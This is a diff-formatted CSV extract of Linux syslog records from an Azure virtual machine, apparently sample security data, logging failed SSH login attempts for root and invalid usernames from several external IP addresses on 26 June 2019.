+16906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:42,UbuntuDevEnv,2019-06-26 07:44:41,auth,UbuntuDevEnv,info,Invalid user magento from 87.101.240.10 port 34974,47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,87.101.240.1,34974,,
+16907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:42,UbuntuDevEnv,2019-06-26 07:44:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:42,UbuntuDevEnv,2019-06-26 07:44:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:44,UbuntuDevEnv,2019-06-26 07:44:43,auth,UbuntuDevEnv,info,Failed password for invalid user magento from 87.101.240.10 port 34974 ssh2,47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,87.101.240.1,34974,,
+16910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:44,UbuntuDevEnv,2019-06-26 07:44:43,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 34974:11: Bye Bye [preauth],47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,34974,,
+16911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:44,UbuntuDevEnv,2019-06-26 07:44:43,auth,UbuntuDevEnv,info,Disconnected from invalid user magento 87.101.240.10 port 34974 [preauth],47274,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,magento,87.101.240.1,34974,,
+16912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:45:34,UbuntuDevEnv,2019-06-26 07:45:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156  user=root,47558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,206.189.118.1,,0,
+16913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:45:36,UbuntuDevEnv,2019-06-26 07:45:35,auth,UbuntuDevEnv,info,Failed password for root from 206.189.118.156 port 45094 ssh2,47558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,45094,,
+16914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:45:36,UbuntuDevEnv,2019-06-26 07:45:35,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 206.189.118.156 port 45094 [preauth],47558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,206.189.118.1,45094,,
+16915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:45:36,UbuntuDevEnv,2019-06-26 07:45:35,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 45094:11: Bye Bye [preauth],47558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,45094,,
+16916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:47,UbuntuDevEnv,2019-06-26 07:50:46,auth,UbuntuDevEnv,info,Invalid user mmmm from 45.55.190.46 port 38420,48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mmmm,45.55.190.4,38420,,
+16917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:47,UbuntuDevEnv,2019-06-26 07:50:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:47,UbuntuDevEnv,2019-06-26 07:50:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:49,UbuntuDevEnv,2019-06-26 07:50:48,auth,UbuntuDevEnv,info,Failed password for invalid user mmmm from 45.55.190.46 port 38420 ssh2,48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mmmm,45.55.190.4,38420,,
+16920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:49,UbuntuDevEnv,2019-06-26 07:50:48,auth,UbuntuDevEnv,info,Disconnected from invalid user mmmm 45.55.190.46 port 38420 [preauth],48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mmmm,45.55.190.4,38420,,
+16921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:50:49,UbuntuDevEnv,2019-06-26 07:50:48,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 38420:11: Bye Bye [preauth],48647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,38420,,
+16922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:14,UbuntuDevEnv,2019-06-26 08:02:13,auth,UbuntuDevEnv,info,Invalid user ui from 45.55.190.46 port 50532,51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ui,45.55.190.4,50532,,
+16923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:14,UbuntuDevEnv,2019-06-26 08:02:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:14,UbuntuDevEnv,2019-06-26 08:02:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:16,UbuntuDevEnv,2019-06-26 08:02:16,auth,UbuntuDevEnv,info,Failed password for invalid user ui from 45.55.190.46 port 50532 ssh2,51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ui,45.55.190.4,50532,,
+16926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:16,UbuntuDevEnv,2019-06-26 08:02:16,auth,UbuntuDevEnv,info,Disconnected from invalid user ui 45.55.190.46 port 50532 [preauth],51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ui,45.55.190.4,50532,,
+16927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:02:16,UbuntuDevEnv,2019-06-26 08:02:16,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 50532:11: Bye Bye [preauth],51133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,50532,,
+16928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:11:31,UbuntuDevEnv,2019-06-26 08:11:30,auth,UbuntuDevEnv,info,Connection closed by 89.132.191.139 port 49044 [preauth],53103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.132.191.1,49044,,
+16929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:28,UbuntuDevEnv,2019-06-26 08:13:27,auth,UbuntuDevEnv,info,Invalid user qbf77101 from 185.103.243.78 port 40648,53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qbf77101,185.103.243.7,40648,,
+16930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:28,UbuntuDevEnv,2019-06-26 08:13:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+16931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:28,UbuntuDevEnv,2019-06-26 08:13:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:29,UbuntuDevEnv,2019-06-26 08:13:29,auth,UbuntuDevEnv,info,Failed password for invalid user qbf77101 from 185.103.243.78 port 40648 ssh2,53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qbf77101,185.103.243.7,40648,,
+16933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:29,UbuntuDevEnv,2019-06-26 08:13:29,auth,UbuntuDevEnv,info,Disconnected from invalid user qbf77101 185.103.243.78 port 40648 [preauth],53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qbf77101,185.103.243.7,40648,,
+16934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:13:29,UbuntuDevEnv,2019-06-26 08:13:29,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 40648:11: Bye Bye [preauth],53550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,40648,,
+16935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:42,UbuntuDevEnv,2019-06-26 08:14:42,auth,UbuntuDevEnv,info,Invalid user sa from 45.55.190.46 port 45204,53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,45.55.190.4,45204,,
+16936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:42,UbuntuDevEnv,2019-06-26 08:14:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:42,UbuntuDevEnv,2019-06-26 08:14:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:44,UbuntuDevEnv,2019-06-26 08:14:43,auth,UbuntuDevEnv,info,Invalid user keng from 183.47.14.74 port 36832,53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keng,183.47.14.7,36832,,
+16939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:44,UbuntuDevEnv,2019-06-26 08:14:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+16940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:44,UbuntuDevEnv,2019-06-26 08:14:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:45,UbuntuDevEnv,2019-06-26 08:14:45,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 45.55.190.46 port 45204 ssh2,53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,45.55.190.4,45204,,
+16942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:45,UbuntuDevEnv,2019-06-26 08:14:45,auth,UbuntuDevEnv,info,Failed password for invalid user keng from 183.47.14.74 port 36832 ssh2,53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keng,183.47.14.7,36832,,
+16943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:45,UbuntuDevEnv,2019-06-26 08:14:45,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 45204:11: Bye Bye [preauth],53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,45204,,
+16944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:45,UbuntuDevEnv,2019-06-26 08:14:45,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 45.55.190.46 port 45204 [preauth],53712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,45.55.190.4,45204,,
+16945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:46,UbuntuDevEnv,2019-06-26 08:14:46,auth,UbuntuDevEnv,info,Disconnected from invalid user keng 183.47.14.74 port 36832 [preauth],53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,keng,183.47.14.7,36832,,
+16946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:14:46,UbuntuDevEnv,2019-06-26 08:14:46,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 36832:11: Bye Bye [preauth],53789,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,36832,,
+16947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:50,UbuntuDevEnv,2019-06-26 08:16:49,auth,UbuntuDevEnv,info,Invalid user shua from 185.103.243.78 port 48584,54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shua,185.103.243.7,48584,,
+16948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:50,UbuntuDevEnv,2019-06-26 08:16:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+16949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:50,UbuntuDevEnv,2019-06-26 08:16:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:52,UbuntuDevEnv,2019-06-26 08:16:51,auth,UbuntuDevEnv,info,Failed password for invalid user shua from 185.103.243.78 port 48584 ssh2,54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shua,185.103.243.7,48584,,
+16951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:52,UbuntuDevEnv,2019-06-26 08:16:51,auth,UbuntuDevEnv,info,Disconnected from invalid user shua 185.103.243.78 port 48584 [preauth],54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shua,185.103.243.7,48584,,
+16952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:16:52,UbuntuDevEnv,2019-06-26 08:16:51,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 48584:11: Bye Bye [preauth],54345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,48584,,
+16953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:51,UbuntuDevEnv,2019-06-26 08:17:50,auth,UbuntuDevEnv,info,Invalid user jsimon from 143.0.52.117 port 45936,54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,143.0.52.1,45936,,
+16954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:51,UbuntuDevEnv,2019-06-26 08:17:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:51,UbuntuDevEnv,2019-06-26 08:17:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+16956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:53,UbuntuDevEnv,2019-06-26 08:17:52,auth,UbuntuDevEnv,info,Failed password for invalid user jsimon from 143.0.52.117 port 45936 ssh2,54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,143.0.52.1,45936,,
+16957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:53,UbuntuDevEnv,2019-06-26 08:17:53,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 45936:11: Bye Bye [preauth],54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,45936,,
+16958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:17:53,UbuntuDevEnv,2019-06-26 08:17:53,auth,UbuntuDevEnv,info,Disconnected from invalid user jsimon 143.0.52.117 port 45936 [preauth],54562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jsimon,143.0.52.1,45936,,
+16959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:07,UbuntuDevEnv,2019-06-26 08:18:06,auth,UbuntuDevEnv,info,Invalid user splash from 183.47.14.74 port 52468,54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,splash,183.47.14.7,52468,,
+16960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:07,UbuntuDevEnv,2019-06-26 08:18:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+16961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:07,UbuntuDevEnv,2019-06-26 08:18:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:09,UbuntuDevEnv,2019-06-26 08:18:09,auth,UbuntuDevEnv,info,Failed password for invalid user splash from 183.47.14.74 port 52468 ssh2,54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,splash,183.47.14.7,52468,,
+16963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:10,UbuntuDevEnv,2019-06-26 08:18:10,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 52468:11: Bye Bye [preauth],54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,52468,,
+16964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:10,UbuntuDevEnv,2019-06-26 08:18:10,auth,UbuntuDevEnv,info,Disconnected from invalid user splash 183.47.14.74 port 52468 [preauth],54610,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,splash,183.47.14.7,52468,,
+16965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:46,UbuntuDevEnv,2019-06-26 08:18:46,auth,UbuntuDevEnv,info,Invalid user david from 185.103.243.78 port 35964,54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,185.103.243.7,35964,,
